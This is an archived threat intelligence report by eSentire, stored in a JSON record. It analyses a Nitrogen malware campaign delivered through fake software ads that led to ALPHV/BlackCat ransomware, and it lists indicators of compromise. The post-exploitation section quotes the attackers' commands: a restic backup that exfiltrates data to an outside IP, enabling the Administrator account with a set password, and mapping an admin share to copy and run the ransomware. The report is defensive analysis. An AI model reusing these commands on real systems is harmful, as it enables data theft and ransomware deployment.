{
	"id": "ed6943a8-8959-4838-ba12-d7ca8d586c6a",
	"created_at": "2026-04-06T00:06:42.245155Z",
	"updated_at": "2026-04-10T03:29:40.176014Z",
	"deleted_at": null,
	"sha1_hash": "ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25",
	"title": "Nitrogen Campaign 2.0: Reloads with Enhanced Capabilities Leading to ALPHV/BlackCat Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1769236,
	"plain_text": "Nitrogen Campaign 2.0: Reloads with Enhanced Capabilities\r\nLeading to ALPHV/BlackCat Ransomware\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 19:09:14 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nIn October 2023, our Threat Response Unit (TRU) observed multiple incidents stemming from a new Nitrogen\r\ncampaign. You can read more on the previous Nitrogen campaign from one of our articles here. One of these\r\nincidents ultimately led to ALPHV/BlackCat Ransomware. In this case, threat actors infiltrated the network,\r\ngaining their initial foothold through malicious payloads from a drive-by download.\r\nA drive-by download involves the involuntary installation of malicious software on a user's system without their\r\ninformed consent. It often occurs when users visit or are redirected to compromised websites, sometimes through\r\nmechanisms like deceptive Google Ads. In this case, we assessed that the user was directed to malware on a\r\nwebsite posing as legitimate software from a search advertisement. 
In the second case, the user was deceived\r\nwhen attempting to install WinSCP software.\r\nThis article will explore the commands employed by the threat actors during their post-exploitation phase and take\r\na closer look at the payloads involved.\r\nInitial Infection Stage and Technical Analysis\r\nIn the first incident, our team traced post-exploitation activity to an unmanaged device with access to the\r\ncustomer’s network. Analysis of available logs pointed to a drive-by download and installation of Nitrogen\r\npayloads from a malicious search advertisement.\r\nFortunately, we were able to identify a matching ISO file uploaded to VirusTotal (MD5:\r\n06345b04244b629f9632009cafa23fc1). Our analysis of the initial infection stage draws from this file, which was\r\ncorroborated by behaviors observed in our security telemetry from this incident and others.\r\nhttps://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware\r\nPage 1 of 18\n\nThe ISO image contains multiple files, as shown in Figure 1.\r\nFigure 1: Contents of an ISO image\r\nThe “support” folder contains multiple garbage files. We will focus on the following files:\r\ndata (MD5: a2b4adedd0f1d24e33d82abebfe976c8)\r\nfoo.dll (MD5: 9aedc564960e5dddeb6524b39d5c2956)\r\nmsi.dll (MD5: 8342db04a12dd141b23a20fd393bb9f2)\r\nsetup.exe (MD5: e5da170027542e25ede42fc54c929077)\r\nsetup.exe is the Windows Installer executable (msiexec.exe). When executed, it loads the msi.dll file modified by\r\nthe threat actor(s). The modified msi.dll uses a custom import named “nop” to load foo.dll and call its exported function\r\n“nop” (Figure 2).\r\nFigure 2: Custom import loading foo.dll\r\nfoo.dll is responsible for decrypting the “data” file with the AES algorithm. 
The key and IV are hardcoded in\r\nobfuscated form in the binary. Like in the previous campaign, some strings are obfuscated using a simple Caesar\r\ncipher, where each character is shifted up by a specific number of places (e.g., 5), as shown in Figure 3.\r\nFigure 3: Caesar cipher encryption on some of the strings used in the binary\r\nUpon decrypting the “data” file, we obtain a ZIP archive, as shown in Figure 4, where custom_installer.exe (MD5:\r\n55144c356dbfaf88190c054011db812e) is another malicious payload and Advanced_IP_Scanner.exe (MD5:\r\n5537c708edb9a2c21f88e34e8a0f1744) is the legitimate Advanced IP Scanner installer, used as a decoy.\r\nFigure 4: Contents of the decrypted ZIP archive\r\nThe custom_installer.exe payload is responsible for decrypting another ZIP archive that contains additional payloads to\r\nbe placed across multiple folders, as well as establishing a persistence mechanism via scheduled tasks. The folders\r\ncontaining malicious payloads are shown in Figure 5. The files in the Notepad folder in this particular sample only\r\ncontain legitimate Python dependencies and are not included in the screenshot for clarity.\r\nFigure 5: Decrypted ZIP archive containing the payloads that are dropped across multiple folders\r\n(custom_installer.exe)\r\nIn the previous campaign, Nitrogen set the scheduled tasks to point to pythonw.exe in order to side-load the\r\nmalicious DLL. The latest campaign, in contrast, creates two scheduled tasks that execute the commands shown in\r\nFigure 6.\r\nFigure 6: Encrypted commands in the scheduled tasks\r\nThe scheduled task names (OneDrive Security Task-S-1-5-21-5678566754-9123742832-2638705499-2003)\r\nremain the same as in the previous campaign. 
The file update.exe (MD5: e5da170027542e25ede42fc54c929077)\r\nis a legitimate msiexec.exe executable (Windows Installer) that has been renamed. When the command is\r\nexecuted, the payload spawns under the processes spoolsv.exe and dllhost.exe within the directories\r\n“C:\\Users\\\u003cusername\u003e\\AppData\\Local\\OneDrive\\” and “C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Security\\” respectively.\r\nUpon further analysis of the binary, we discovered that the base64-encoded string passed on the command line contains a nonce, an encrypted\r\nkey, and a list of text strings encrypted using the ChaCha stream cipher. The decrypted strings are the following:\r\ntransacted_hollowing#C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Security\\pythonw.exe#C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Security\\dllhost.exe\r\ntransacted_hollowing#C:\\Users\\\u003cusername\u003e\\AppData\\Local\\OneDrive\\pythonw.exe#C:\\Users\\\u003cusername\u003e\\AppData\\Local\\OneDrive\\spoolsv.exe\r\nThe “msi.dll” files are side-loaded during the scheduled task execution and contain the custom imports to\r\nadditionally load the zen.dll (MD5: 6557a11aac33c4e6e10eeea252157f3e) and fid.dll (MD5:\r\n1f04ca6ffef0b737204f3534ff73575e) files shown in Figure 5. 
These, in turn, access the base64-encoded\r\ncommand-line argument, decrypt it, and use the decrypted strings as configuration parameters.\r\nThe payloads zen.dll and fid.dll use the transacted hollowing technique shown in Figure 7. Transacted hollowing\r\ncombines elements of both Process Hollowing and Process Doppelgänging: it uses Windows Native API functions\r\nsuch as NtCreateTransaction and RtlSetCurrentTransaction to create and open the transacted file, CreateProcessInternalW\r\nto create the spoolsv.exe and dllhost.exe processes in a suspended state, and then performs process injection by\r\nunmapping the process memory and replacing it with the pythonw.exe binary.\r\nFigure 7: The code responsible for performing transacted hollowing\r\nWhen pythonw.exe is executed from the specified directories, it side-loads the malicious python311.dll files.\r\nThese files contain embedded and obfuscated C2 addresses (see Indicators of Compromise table), which are used\r\nfor persistent C2 communication.\r\nIn the recent Nitrogen campaign, besides introducing transacted hollowing, the threat actor(s) returned with an\r\narray of enhanced capabilities. These include bypassing the Antimalware Scan Interface (AMSI), Event\r\nTracing for Windows (ETW) and Windows Lockdown Policy (WLDP); antivirus evasion using\r\nAntiHook (which evades the userland hooking techniques employed by antivirus software); and use of the\r\nKrakenMask sleep obfuscation tool to mask return addresses within the AMSI bypass, ETW and WLDP patching and\r\nAntiHook functions, and to encrypt the .text section contents. 
For the sake of brevity, we won't delve into the\r\ntechnical intricacies of these functions in this article.\r\nThe switch to the Sliver C2 Framework\r\nIn one of the recent Nitrogen samples, the slv.py (MD5: 88423cf8154ccc3278abea0e97446003) file is dropped\r\nunder the C:\\Users\\\u003cusername\u003e\\AppData\\Local\\Notepad folder.\r\nslv.py contains Python code that decodes a base64 string, deserializes the resulting bytes using the marshal\r\nmodule, and then executes the resulting obfuscated Python code. We believe that the threat actor(s) adopted the\r\nobfuscation technique from this obfuscation tool.\r\nFigure 8 shows the disassembled Python bytecode. The bytecode is responsible for decrypting data.aes (MD5:\r\nd36269ac785f6b0588fbd7bfd1b50a57) using AES. The decrypted DLL is a Sliver payload (MD5:\r\na9e5c83f7d96144fa31126ef0a7a9e2f) that connects to the C2 server at 194.180.48[.]149:8443. Previously,\r\nNitrogen threat actors used the Pyramid C2 Framework for post-exploitation.\r\nFigure 8: Disassembled Python code (data.aes)\r\nNitrogen and Post-Exploitation Leading to ALPHV Ransomware\r\nUpon establishing the initial foothold, threat actors moved laterally to other hosts in the environment and dropped\r\nmultiple obfuscated Python scripts similar to slv.py:\r\nwo9.py (MD5: 45d8598ff20254c157330dbdf5a8110b)\r\nwo10.py (MD5: 0200a95373be2a1851db27c96704fc11)\r\nwo4.py (MD5: 5462b15734ef87764ef901ad0e20c353)\r\nupdateegge.py (MD5: 300ca3391a413faf0e5491898715365f)\r\nwo9.py, wo10.py, and wo4.py contain embedded, AES-encrypted Cobalt Strike payloads. 
Using the Cobalt\r\nStrike configuration parser from SentinelOne, we can extract the Cobalt Strike configuration (see Indicators of\r\nCompromise table).\r\nupdateegge.py is similar to slv.py and decrypts dotae.aes (MD5: 4722f13c22abaa6045c544ee7dde3e5a) to the\r\nSliver payload (MD5: 9f1c9b28eaf00b9aec180179255d87c0) that connects to 185.216.70[.]236:8443.\r\nFurther on, threat actors utilized PsExec and WMIC for lateral movement and ran Restic (a backup program)\r\nto exfiltrate data:\r\nrestic.exe -r rest:hxxp://195.123.230[.]165:8000/ --password-file ppp.txt --use-fs-snapshot --verbose\r\nbackup \\\\\u003cREDACTED\u003e\r\nThe threat actors also enabled the Administrator account and multiple other accounts with the password “GoodLuck!”:\r\nnet1 user Administrator GoodLuck! /domain\r\nOne of the dropped batch files contained the commands to map the C$ administrative share of a machine to the\r\nlocal drive letter N: using the Administrator account with the password “GoodLuck!”, to copy the\r\nALPHV ransomware binaries (safe.exe) from the N: drive to the C: drive, and to execute them:\r\nnet use N: \"\\\\\u003cREDACTED\u003e\\C$\" /USER:\u003cREDACTED\u003e\\Administrator GoodLuck! /PERSISTENT:YES\r\ncopy N:\\safe.exe C:\\\r\nC:\\safe.exe --access-token \u003cREDACTED\u003e\r\nAnother batch file named UpdateEGGE.bat contained the command to run the wo4.py file via pythonw.exe:\r\nC:\\\u003cREDACTED\u003e \\python\\pythonw.exe C:\\\u003cREDACTED\u003e \\python\\wo4.py\r\nWe also observed the threat actors renaming pythonw.exe to itw.exe and ServiceUpdate.exe.\r\nAnother Case of Nitrogen\r\nIn another incident involving a Nitrogen infection, our 24/7 SOC Cyber Analysts conducted an investigation to\r\ntrace the origin of the malicious file (Figure 9). 
They found that the affected user fell victim to a drive-by\r\ndownload while using a search platform, inadvertently downloading the malicious file.\r\nThreat actors used Punycode to make the domain look trustworthy. Punycode is a method for encoding Unicode\r\ncharacters into ASCII, used mainly for internationalized domain names (IDNs) that contain non-ASCII characters. This\r\nallows domains to contain characters from various languages. Threat actors can abuse Punycode to conduct what's\r\nknown as an IDN homograph attack.\r\nFigure 9: The malicious website serving a fake WinSCP installer\r\nThe following reconnaissance commands were executed to gather information about the network and users:\r\nnltest /DOMAIN_TRUSTS\r\nnet group \"domain admins\" /DOMAIN\r\nnet1 localgroup Administrators\r\nBased on the overlap in Tactics, Techniques, and Procedures (TTPs), we assess the primary objective was likely\r\nransomware deployment, similar to the previously mentioned case. The threat actor(s) made attempts to manually\r\nexecute slv.py (the Sliver payload) from the PowerShell command line.\r\nHow did we find it?\r\neSentire MDR for Endpoint identified Python-based post-exploitation activities.\r\nWhat did we do?\r\nWe investigated and confirmed that the activity was malicious.\r\nOur team of 24/7 SOC Cyber Analysts isolated affected hosts to contain the incidents in accordance with\r\nthe business’ policies.\r\nWhat can you learn from this TRU positive?\r\nThe end goal for Nitrogen infections is to deliver ALPHV ransomware and perform data exfiltration.\r\nIn one of the cases, opportunistic infections resulting from drive-by downloads were leveraged for hands-on-keyboard attacks. 
This transition took place in under 1 hour and 18 minutes.\r\nThe threat actor(s) switched from the Pyramid C2 Framework to Sliver C2.\r\nIn the latest Nitrogen campaign, threat actors introduced transacted hollowing and showcased an expanded\r\nset of advanced capabilities. They can now bypass the Antimalware Scan Interface (AMSI), patch Event\r\nTracing for Windows (ETW) and Windows Lockdown Policy (WLDP), and evade antivirus products using\r\nAntiHook. Additionally, the KrakenMask tool is employed to conceal return addresses within functions\r\nrelated to AMSI bypass, ETW, WLDP patching, and AntiHook, as well as to encrypt the .text section\r\ncontents.\r\nRecommendations from our Threat Response Unit (TRU) Team:\r\nTrain users to identify and report potentially malicious content using Phishing and Security Awareness\r\nTraining (PSAT) programs.\r\nEnsure employees have access to a dedicated software center to download corporate-approved software.\r\nProtect endpoints against malware by:\r\nEnsuring antivirus signatures are up-to-date.\r\nUsing a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) tool to detect and\r\ncontain threats.\r\nOur Threat Response Unit (TRU) is a world-class team of threat researchers who develop new detections enriched\r\nby original threat intelligence and leverage new machine learning models that correlate multi-signal data and\r\nautomate rapid response to advanced threats.\r\nIf you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and\r\nput your business ahead of disruption.\r\nLearn what it means to have an elite team of Threat Hunters and Researchers that works for you. 
Connect with an\neSentire Security Specialist.\nIndicators of Compromise\nName Indicators\r\nInitial Nitrogen ISO file 06345b04244b629f9632009cafa23fc1\r\ndata a2b4adedd0f1d24e33d82abebfe976c8\r\nfoo.dll 9aedc564960e5dddeb6524b39d5c2956\r\nmsi.dll 8342db04a12dd141b23a20fd393bb9f2\r\ncustom_installer.exe 55144c356dbfaf88190c054011db812e\r\nupdate.exe e5da170027542e25ede42fc54c929077\r\nzen.dll 6557a11aac33c4e6e10eeea252157f3e\r\nfid.dll 1f04ca6ffef0b737204f3534ff73575e\r\nslv.py 88423cf8154ccc3278abea0e97446003\r\ndata.aes 
d36269ac785f6b0588fbd7bfd1b50a57\r\nwo9.py 45d8598ff20254c157330dbdf5a8110b\r\nwo10.py 0200a95373be2a1851db27c96704fc11\r\nwo4.py 5462b15734ef87764ef901ad0e20c353\r\nupdateegge.py 300ca3391a413faf0e5491898715365f\r\ndotae.aes 4722f13c22abaa6045c544ee7dde3e5a\r\nSliver payload 9f1c9b28eaf00b9aec180179255d87c0\r\nNitrogen C2 185.216.70[.]236:8443\r\nNitrogen C2 194.180.48[.]149:8443\r\nNitrogen C2 tcp://171.22.28[.]245:15159/\r\nNitrogen C2 tcp://171.22.28[.]245:41337\r\nNitrogen C2 194.180.48[.]18:10443/\r\nNitrogen C2 tcpssl://171.22.28[.]245:20407/\r\nNitrogen C2 171.22.28[.]245:10443\r\nCobalt Strike C2 194.169.175[.]132\r\nCobalt Strike C2 194.180.48[.]169\r\nCobalt Strike C2 walfat[.]com\r\nCobalt Strike C2 193.42.33[.]29\r\nPotential Brute Ratel C2 (observed in one of the campaigns) 185.216.71[.]108\r\nALPHV binary 50da58b837bb80f840891cf5c212902b9431349c3b2e2707f1e0f9df226fa512\r\nALPHV binary 44d3065d4c5c1a2a448de07ffe256a8e73795770c9462d8d27f659671f8455d2\r\nPsExec 9d00158489f0a399fc0bc3ce1e8fc309d29a327f6ea0097e34e0f49b72a85079\r\nWebsite hosting fake WinSCP installer hxxp://xn--wnscp-tsa.net\r\nReferences\r\nhttps://www.esentire.com/blog/persistent-connection-established-nitrogen-campaign-leverages-dll-side-loading-technique-for-c2-communication\r\nhttps://www.esentire.com/security-advisories/increased-activity-in-google-ads-distributing-information-stealers\r\nhttps://github.com/hasherezade/transacted_hollowing\r\nhttps://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\r\nhttps://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing\r\nhttps://learn.microsoft.com/en-us/windows/win32/devnotes/windows-lockdown-policy\r\nhttps://github.com/BishopFox/sliver\r\nhttps://github.com/NtRaiseHardError/Antimalware-Research/tree/master/Generic/Userland Hooking/AntiHook\r\nhttps://en.wikipedia.org/wiki/IDN_homograph_attack\r\nhttps://github.com/Sl-Sanda-Ru/Py-Fuscate/blob/main/py_fuscate.py\r\nhttps://github.com/Sentinel-One/CobaltStrikeParser\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. 
By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware"
	],
	"report_names": [
		"nitrogen-campaign-2-0-reloads-with-enhanced-capabilities-leading-to-alphv-blackcat-ransomware"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434002,
	"ts_updated_at": 1775791780,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25.pdf",
		"text": "https://archive.orkl.eu/ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25.txt",
		"img": "https://archive.orkl.eu/ccfe60f5a8e32c118e782abb5d3ad5d500b4bf25.jpg"
	}
}